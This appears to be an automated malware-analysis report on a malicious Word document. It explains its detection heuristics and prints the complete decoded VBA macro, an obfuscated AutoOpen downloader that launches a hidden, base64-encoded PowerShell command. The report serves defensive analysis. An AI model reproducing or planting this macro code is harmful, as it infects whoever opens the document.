Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0059cf6c0e3e233d…

MALICIOUS

Office (OLE)

Size: 94.8 KB | Created: 2018-06-08 22:11:00 | Authoring application: Microsoft Office Word | First seen: 2018-06-25
MD5: c4817e32b1aac6b6cce223668c742d9b
SHA-1: b72ab48ec0cc96accc4f8fbeb01575e497747aa2
SHA-256: 0059cf6c0e3e233d4e59fb11d2532f090fc474027e2957819d6d4a1a9e30e44b
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a Microsoft Office (Word) document containing a VBA macro. The Autoopen subroutine runs automatically when the document is opened and calls the oiOjVSFjhGw function, which invokes Shell(). The command passed to Shell() is assembled at run time from concatenated fragments: a Chr() call supplies the first character, the literal "owers" follows, and the remaining pieces come from helper functions (QlmMA, KiDCLthBoiw, oMTEIoiOCH, kiHZjY, iBudKJnR) that each return further string fragments. The word 'powershell' therefore never appears intact in the source; the visible fragments join to 'powersHeLL -e' followed by base64-looking text, i.e. a PowerShell invocation with an encoded command. The second Shell() argument, 36982 - 36982, evaluates to 0 (vbHide), so the spawned process runs with a hidden window. The nested For loops filled with meaningless arithmetic on undefined variables, protected by On Error Resume Next, are junk code inserted to hinder analysis. This indicates the macro is designed to download and execute a second-stage payload. The ClamAV detection name 'Doc.Malware.Powload-6799120-0' further supports this assessment.

Heuristics (7)

  • ClamAV: Doc.Malware.Powload-6799120-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6799120-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script:
    Next
    oiOjVSFjhGw = fmjDYiibl + Shell(cwBJJlsiF + Chr(okpmzhHtCFp + vbKeyP + fMpib) + "owers" + QlmMA + KiDCLthBoiw + oMTEIoiOCH + kiHZjY + iBudKJnR, 36982 - 36982)
    For bmPBmW = ATSiGN To qiKfL
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    End Function
    Sub Autoopen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  12644 bytes
SHA-256: 042347550a96938b1822e75d9ac05b5c89a7d159eb992d5a6fae18651c742fb1

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "VbFMwkGTQDjPp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function oiOjVSFjhGw()
On Error Resume Next
For JmjkmC = AENFC To tSFFw
      For PPRknP = lYjij To 30074
         JAdZzI = (43941 / CBool(LwSLpM) - DVDqHE / Oct(59485 / Hex(85723) / wVbQm + Rnd(WipEC / Fix(37))))
Next
   ojFoGn = 6594 - 36676
Next
For cZzrV = itHtf To bdijG
      For uboVlK = OpzBB To 32902
         ZkTviZ = (33480 / CBool(slhKX) - MDbIAz / Oct(17024 / Hex(83588) / GonqGY + Rnd(rGcDhr / Fix(37))))
Next
   jCjYr = 67995 - 4656
Next
oiOjVSFjhGw = fmjDYiibl + Shell(cwBJJlsiF + Chr(okpmzhHtCFp + vbKeyP + fMpib) + "owers" + QlmMA + KiDCLthBoiw + oMTEIoiOCH + kiHZjY + iBudKJnR, 36982 - 36982)
For bmPBmW = ATSiGN To qiKfL
      For bhUDVt = FTZRIb To 36370
         BbElJ = (96594 / CBool(Jkzkv) - LwNLXI / Oct(23687 / Hex(87597) / Ljsin + Rnd(uAZfus / Fix(37))))
Next
   GGtBvV = 46902 - 67544
Next
End Function
Sub Autoopen()
On Error Resume Next
For lzOuV = FkSGU To QYtfKZ
      For jaFBk = sHSVM To 83123
         jHuuP = (87187 / CBool(ivpMn) - GphAW / Oct(71224 / Hex(90705) / zdjwi + Rnd(cFnOG / Fix(37))))
Next
   wzIdw = 29752 - 33491
Next
oiOjVSFjhGw
For joksN = PCZSz To wLkdOw
      For VidIaG = ZHjDB To 13360
         jdKtn = (66835 / CBool(IafUP) - TnPfPz / Oct(57385 / Hex(92294) / CjJmpm + Rnd(VWQsH / Fix(37))))
Next
   iZkaP = 36985 - 24719
Next
End Sub


Attribute VB_Name = "znLbFmsB"
Function QlmMA()
On Error Resume Next
For QtjaJ = jtYqrW To KUFoqK
      For hjJhad = NWqDGa To 96283
         cEJJR = (26835 / CBool(DhNOQ) - ahiShq / Oct(38086 / Hex(70320) / wAfwVX + Rnd(nlvdss / Fix(37))))
Next
   fjtNN = 55083 - 53888
Next
CAwmIcRq = "HeLL -e KAAgA" + "G4AZQB3" + "AC0ATwBC" + "AE"
For MNpno = lZkih To FJiUrw
      For ucSmD = jDlncG To 15243
         inSGi = (66833 / CBool(BLLzL) - vVCYV / Oct(31792 / Hex(13842) / stamFH + Rnd(AlHXZ / Fix(37))))
Next
   bVLOJN = 91704 - 87003
Next
BtYzRI = "oARQBDA" + "FQAIAAgAGkAbw" + "AuAEM" + "ATwBtAFA" + "AUgBFAHMAUwBpAE" + "8ATgAuAGQARQB"
For Hnshl = jPHqAa To trUdbU
      For ZDblQ = AqKMC To 22137
         bmntXW = (45942 / CBool(WAhYJ) - cUtfmb / Oct(85445 / Hex(82739) / LGRRh + Rnd(FunpmJ / Fix(37))))
Next
   DaGEw = 68224 - 5751
Next
aMAwNa = "GAGwAQQB" + "0AEUAcwB0AF" + "IAZQ" + "BBAE0AKAAg" + "AFsAcwB5AFM" + "AVABF" + "AE0ALgBp" + "AG8ALgBtAEUAT" + "QBvAFIAeQBzAHQA"
For tNHiY = QhPkv To ibnFFq
      For RFujW = UQSYii To 17227
         ARtKmJ = (43145 / CBool(NXEqZY) - nBwGKl / Oct(94925 / Hex(99460) / kwDFwI + Rnd(GmwiKu / Fix(37))))
Next
   ShCdsW = 59133 - 62284
Next
BhTKQt = "UgBlAGEAb" + "QBdACAAWwBDAE" + "8ATgB2AGU" + "AUgB0AF0AOgA" + "6AEYAUgBPA"
For wofXj = wCDRP To oFRqE
      For wDcqRs = fYIIE To 56441
         ErHQSl = (94140 / CBool(oufsiV) - blnofj / Oct(55782 / Hex(58500) / WmREz + Rnd(uwoQVz / Fix(37))))
Next
   AXSuQO = 66036 - 20485
Next
biVqzStBWMm = "E0AQgBBAF" + "MA" + "RQA2ADQAUwB0AF" + "IASQBO" + "AGcAK" + "AAgACcAVgBaAEI"
For NkBwW = QzSbM To ufUsi
      For zhDOzh = lPVlPO To 92463
         wZhCCT = (48967 / CBool(qzukwF) - wBhQid / Oct(41820 / Hex(99258) / UTlFuM + Rnd(MQGzG / Fix(37))))
Next
   qfiazN = 31373 - 10430
Next
srApzz = "AdABUADgASQB3A" + "EYARQBiAC8AUw" + "BqADgAcwBHA" + "FkAdgBTAFkAZwB" + "RAE4ATgBDAFk" + "AawBpAGcAWQB" + "FAEo" + "ARQA0ADAAR" + "QBoAFA" + "AVABkAFgAZ"
For jfWXkh = NRbZzi To iTmivh
      For qIlKL = lIdIj To 59212
         mFiXc = (40337 / CBool(DoWhq) - vwGMj / Oct(40765 / Hex(45637) / qXlMYf + Rnd(EnSqS / Fix(37))))
Next
   zckPB = 50276 - 35970
Next
XfSOqqd = "QBzAHMAcg" + "BYAFEAR" + "gBnAFkAag" + "AvAEgAZQB" + "MAHYAQw" + "BSAC" + "sAYQBkAEsAZQ"
For ClEUD = pCRZO To twhzK
      For pCwAD = XwwTVw To 64644
         FNnmjr = (41375 / CBool(XCWtb) - QAvnF / Oct(96412 / Hex(70347) / QBiNw + Rnd(HVjUr / Fix(37))))
Next
   CjIvR = 35705 - 65294
Next
NMdnj = "A1ACsAVABlAHAA" + "OQA1AGsAVQBK" + "AFQAbQB" + "GAGQAM" + "ABoAEMAVQB" + "WAFYAUgBUAC8" + "AQQBMA" + "GQASgBNAH"
For fwdKP = fzXir To KpwmES
      For OQBWCB = JksAW To 74630
         TkUXX = (97159 / CBool(aKzwcI) - MjWrw / Oct(45472 / Hex(36555) / iabIGD + Rnd(FXMETq / Fix(37))))
Next
   cOjUK = 77576 - 13041
Next
LDzIQ = "gAaQBx" + "AG4AbgBoAD" + "YAVQB5AGUAUQAv" + "AEMAagBmA" + "EcAUQB" + "vADYASABZAFAARQ"
For YZtAw = WIXPz To GuwPs
      For fEZlYo = IHHLd To 24907
         taCCOF = (14262 / CBool(jOopWW) - hRQciI / Oct(3967 / Hex(57103) / AEinuO + Rnd(uCSafr / Fix(37))))
Next
   AmZlVL = 94051 - 67046
Next
TQDPPWtQ = "BIAFIAUABlAFoAQ" + "QBHA" + "G0" + "AcAAxADMAcwBwA" + "FAAcgBVAEwA"
QlmMA = CAwmIcRq + BtYzRI + aMAwNa + BhTKQt + biVqzStBWMm + srApzz + XfSOqqd + NMdnj + LDzIQ + TQDPPWtQ
End Function
Function KiDCLthBoiw()
On Error Resume Next
For vJZqu = iVrwP To KXTzU
      For unDvS = XQpEXj To 35945
         SlniUY = (6535 / CBool(Twjics) - PFlAtC / Oct(91527 / Hex(29172) / qjSdMi + Rnd(KiajYk / Fix(37))))
Next
   iwNBTG = 23034 - 69647
Next
SrMdUPPI = "Kw" + "BxAG0" + "AMQA4AHgAWQBo" + "AGEAbQBuAFMAag"
For iaazl = YnWWnn To FZjpwZ
      For BJRfQ = EfAbI To 75893
         VnDli = (23958 / CBool(FnMBwC) - qoViIm / Oct(60938 / Hex(23174) / Iviia + Rnd(muOAjQ / Fix(37))))
Next
   VuKmu = 98544 - 28323
Next
McVqrTNp = "Bj" + "AFIAYwA1AFEAUw" + "BTADkAOA" + "BiAEMA" + "RA" + "BFAG4ANw" + "BpAEYAWQBzAGMAN" + "AByAG" + "cAQw"
For PiNONr = wAAaJS To qwhEMA
      For nwVcY = bUWsj To 94851
         sMVQM = (2644 / CBool(zOzFH) - aDOEpm / Oct(27092 / Hex(58954) / msloYD + Rnd(iHuLuC / Fix(37))))
Next
   aRrKtU = 48826 - 93592
Next
CAKQGbibM = "B1AHMA" + "bABTAF" + "YAWgByAGYAUwBZA" + "HMAbQB3AH" + "EAMgBkAHoARABU" + "AHAARgAvA" + "HYAMw"
For VasXG = DtjtQ To cfXcDV
      For rLvEYZ = nwbUKC To 80132
         QOjjVM = (9508 / CBool(cAlDw) - TipwpF / Oct(9724 / Hex(49606) / TwTiE + Rnd(OjNkA / Fix(37))))
Next
   JvXzX = 74275 - 19492
Next
zXKPwjuW = "BC" + "AGgAKw" + "BaAHIAT" + "gBzAGEA" + "WAB" + "JAFEAb"
For DnVpB = tfMNkW To tNiCiA
      For ORXTzX = mSwRS To 90231
         Rjcic = (50073 / CBool(jWAAi) - Pipzp / Oct(74014 / Hex(51600) / mPCsi + Rnd(GMNvS / Fix(37))))
Next
   jbjFYF = 50194 - 21371
Next
jFjwncBOrq = "wB" + "IA" + "EUATQB4AE4A" + "VABHADgAYQ" + "BoAH"
KiDCLthBoiw = SrMdUPPI + McVqrTNp + CAKQGbibM + zXKPwjuW + jFjwncBOrq
End Function
Function oMTEIoiOCH()
On Error Resume Next
For uXTTzu = dBcfU To fQalw
      For RWJEh = onBjY To 68215
         PZrsi = (48315 / CBool(ZCjMSm) - jwQim / Oct(13856 / Hex(39180) / IlSlQK + Rnd(CtctT / Fix(37))))
Next
   dnYrM = 37246 - 62116
Next
jEQGiOQ = "oAWgBpAF" + "UAcgB5AHoA" + "OAB0ADAAbQBU" + "AGMA" + "MQBaADAA" + "Ng" + "BFAEIAKwBIADgA" + "MAB6AFk" + "AaQB0AC8" + "AMgB"
For nzmvu = rlFmc To VQGazI
      For SApjZ = DDIsn To 49585
         ofVnfp = (43959 / CBool(PQoqR) - iMjztE / Oct(97960 / Hex(26767) / zNMdq + Rnd(itRMo / Fix(37))))
Next
   qvSuI = 71724 - 33513
Next
KZcrzLAIm = "BACsAcQ" + "B4AFkA" + "bA" + "BMAGsA" + "YgBqAHY" + "AdgAwAEIAVg"
For jBsIq = qbutV To aQYaTL
      For wjXWic = rRODl To 37262
         LivUEm = (41141 / CBool(GzYrz) - aWsbwF / Oct(35741 / Hex(42121) / fOfTd + Rnd(NrHBH / Fix(37))))
Next
   mcFOZ = 20972 - 72066
Next
wraFrwkjUFI = "BMAF" + "cATgB2AEsAMQBTA" + "FYAcQBOAHEAOABi" + "AHQAVgB" + "zAFgAe"
For YzndtR = VbpOOp To QGYTr
      For sIRpsO = umMWuh To 91807
         hbCZMi = (84639 / CBool(SnsZT) - zpGTz / Oct(63850 / Hex(30967) / zkfdAj + Rnd(SUhti / Fix(37))))
Next
   iWtfJA = 86297 - 97979
Next
kHNcXZAo = "QBCAGEAb" + "QBwADAAZgA" + "3AEIATQBoA" + "FYAeQAvAFcA" + "YgBvAHcAdgBrAG" + "YALwBuAH" + "UAUABNAHIAdQ" + "BpAG0ARQBOA"
For zoTin = QajOY To dRuii
      For zzTKj = cUTMnn To 62025
         hvlqJ = (33243 / CBool(tBtwiF) - BEzwir / Oct(87010 / Hex(98315) / pIdGSC + Rnd(nviAT / Fix(37))))
Next
   jEYNNG = 96279 - 49454
Next
nPrHDN = "FAAawAyAFUAQg" + "BzAGIAVA" + "BpAHIAZAA0A" + "DcAagA2A" + "HAAUAB" + "oAEkAUwBI" + "AGQAbwBIAF" + "cANgBzA" + "DMAM" + "gA4AE8AWAA0AFE"
oMTEIoiOCH = jEQGiOQ + KZcrzLAIm + wraFrwkjUFI + kHNcXZAo + nPrHDN
End Function
Function kiHZjY()
On Error Resume Next
For BktTP = rJodi To whfKd
      For zGCwEP = YvXRi To 74271
         JcHtM = (99029 / CBool(rwmuWl) - kWtCk / Oct(31331 / Hex(1351) / KEfiz + Rnd(RTrJrh / Fix(37))))
Next
   Talwd = 5772 - 10805
Next
JFRwkbasv = "AZABWAHkARQB5A" + "HgAKwBGAEYA" + "awBjAEkA" + "cgB" + "pAE" + "4AeABWAGEAT"
For PCiiw = ZiOuWA To SCOizw
      For cukfDR = vHEGN To 90546
         uCzAB = (6550 / CBool(ocOVjN) - YWQdG / Oct(59447 / Hex(63941) / SCahX + Rnd(WKoJFj / Fix(37))))
Next
   ARhws = 67095 - 77097
Next
zHwqtE = "AB" + "lAFMAM" + "ABF" + "AGwAeQBpADQA" + "OABpAEEAaA"
For VKWDP = kocGQ To ZkuaTj
      For RSaLb = dYEiiO To 92352
         CwrDdH = (11397 / CBool(VLCpEw) - XGfMU / Oct(42663 / Hex(99389) / wvWlzf + Rnd(wsUiW / Fix(37))))
Next
   CWqYIf = 93284 - 29598
Next
RrtuXQLb = "BwAFoAcABXAHg" + "AM" + "QBwAHgAYwBH" + "AFkA" + "MAB6AE8ATgAzAE" + "oAQQBaADMAWABGA" + "G0AZQBiAG8AdAB0" + "AEwA"
For mciIh = zBbWDB To IGWGGQ
      For KUVbc = kooMq To 6112
         pItGrw = (57564 / CBool(qsLTmJ) - jCBZj / Oct(4127 / Hex(97755) / HDfNr + Rnd(NPjzV / Fix(37))))
Next
   zNPPI = 73436 - 28832
Next
uVinS = "QgBRAFQA" + "WgBXAHgAe" + "QBQAHYARwB" + "uAF" + "QAVwBIAHUAU" + "gBWAEsANABv" + "AEUAegAyAEI" + "AVABvAGIAdgB" + "jAEwAJwAgACkAI"
For cJIpL = FmKQW To qqlDLl
      For nddfTQ = OVnmR To 88852
         ipwvpB = (42802 / CBool(bFPds) - JbLDX / Oct(158 / Hex(53782) / zioZGH + Rnd(wXzcqL / Fix(37))))
Next
   nIVjP = 63259 - 3272
Next
QOHDcblAap = "AAsACAAWwBJA" + "G8ALgBDAE8AbQ" + "BQAHIAZQBTAF" + "MAaQBP" + "AE" + "4AL"
For PqYrF = bjuuLn To UGQvPW
      For hQABCH = Chnkvp To 52378
         wAOBo = (44410 / CBool(FifXLT) - FnAJZ / Oct(80852 / Hex(99442) / WpwGZB + Rnd(JQwOF / Fix(37))))
Next
   PhNhF = 87494 - 20423
Next
lFsNXCMKP = "gB" + "DAE8AbQBQAFI" + "ARQBTAHMAaQBv" + "AE4AbQB" + "vAEQAZQBd" + "ADoAOgBEAEUAQwB" + "PAG0AcABSAE" + "UAUwBTACAA"
For WiwUA = AjlQlO To dZDiw
      For wYPZwO = pGmbTw To 79025
         ALCmY = (48611 / CBool(aiidr) - lHKzHG / Oct(22431 / Hex(87660) / EzGGm + Rnd(wJwoZk / Fix(37))))
Next
   OBwZNs = 96628 - 69349
Next
hPccK = "KQB8AC" + "AARgBvAHIAZQBBA" + "EM" + "ASAAtAG8AQgBqAG" + "UAQwB0AH" + "sAbgBlAHcALQBPA"
kiHZjY = JFRwkbasv + zHwqtE + RrtuXQLb + uVinS + QOHDcblAap + lFsNXCMKP + hPccK
End Function
Function iBudKJnR()
On Error Resume Next
For SWuEwc = MpdisG To jSmMd
      For mpROH = IDhsSv To 45199
         jjMiu = (37992 / CBool(jwwGlI) - QHajUO / Oct(8905 / Hex(56917) / fwFUZ + Rnd(zKiVrV / Fix(37))))
Next
   FERJpC = 81594 - 41270
Next
mKnUIPlZu = "EIASg" + "BFAEMAV" + "AAgAHMAWQ" + "BzAHQARQBNA" + "C4ASQ" + "BPAC4AcwB0A" + "FIAZQBB" + "AG0Acg" + "BlAGEARAB"
For WlJma = maJJD To jlpzHE
      For lYQQd = BVOKZ To 3782
         jXZTKm = (8284 / CBool(XHLiST) - TbKiz / Oct(78420 / Hex(68844) / GUjTYw + Rnd(QkHQt / Fix(37))))
Next
   LWoUA = 44012 - 27263
Next
AzBzuMJX = "FAFIAKAAgACQA" + "XwAsAFsA" + "cwBZAHMA" + "dABFAG0ALgB0AE" + "UAe"
For EhLzc = mArEw To nTwiS
      For iwrbaC = QHFVN To 94519
         VTBnU = (37933 / CBool(tmQtDR) - VsXKBV / Oct(77960 / Hex(29365) / cGJaM + Rnd(jidHji / Fix(37))))
Next
   RLJzj = 78295 - 24746
Next
PpHvj = "ABUAC4ARQ" + "BuAGMA" + "bw" + "BEAGkA" + "bgBnAF0AOgA6A" + "GEAUwBjAEkASQA"
For iXkfuO = KLcdGv To jLtkz
      For lPwlP = aLACl To 99665
         zujYu = (33876 / CBool(wTSiDY) - sfzFz / Oct(82211 / Hex(14480) / SbzQtn + Rnd(KIqdD / Fix(37))))
Next
   iznwSR = 14050 - 33786
Next
auiivQNGM = "gACkAfQApA" + "C4AcgBFA" + "EE" + "AZABUAG8AZ" + "QBOAEQAK" + "AApAC" + "AAfAAgACYAIAA"
For Rircij = wmJuG To HZiYsa
      For JoZUb = iKHjZ To 437
         VKRZR = (11419 / CBool(HMDUJr) - pNTuY / Oct(62427 / Hex(15359) / cIWBTz + Rnd(oFjuiG / Fix(37))))
Next
   IEGnjC = 94708 - 71817
Next
RMRdMIoWG = "oACAAJABzAGgAR" + "QBsAGw" + "AaQB" + "kAFsAMQBdA" + "CsAJABzAGgA" + "RQBs" + "AEwAaQBkAFsA" + "MQAzAF0AKw" + "AnAFgA"
For LkLtz = mBTQhh To CQmtP
      For zlOIv = FOnkwF To 82551
         DLQHEu = (1996 / CBool(haRZP) - CqAqma / Oct(76710 / Hex(38559) / bQBsZz + Rnd(WKqqF / Fix(37))))
Next
   zioVWd = 6711 - 76040
Next
VKXfAUC = "JwApAA" + "=="
iBudKJnR = mKnUIPlZu + AzBzuMJX + PpHvj + auiivQNGM + RMRdMIoWG + VKXfAUC
End Function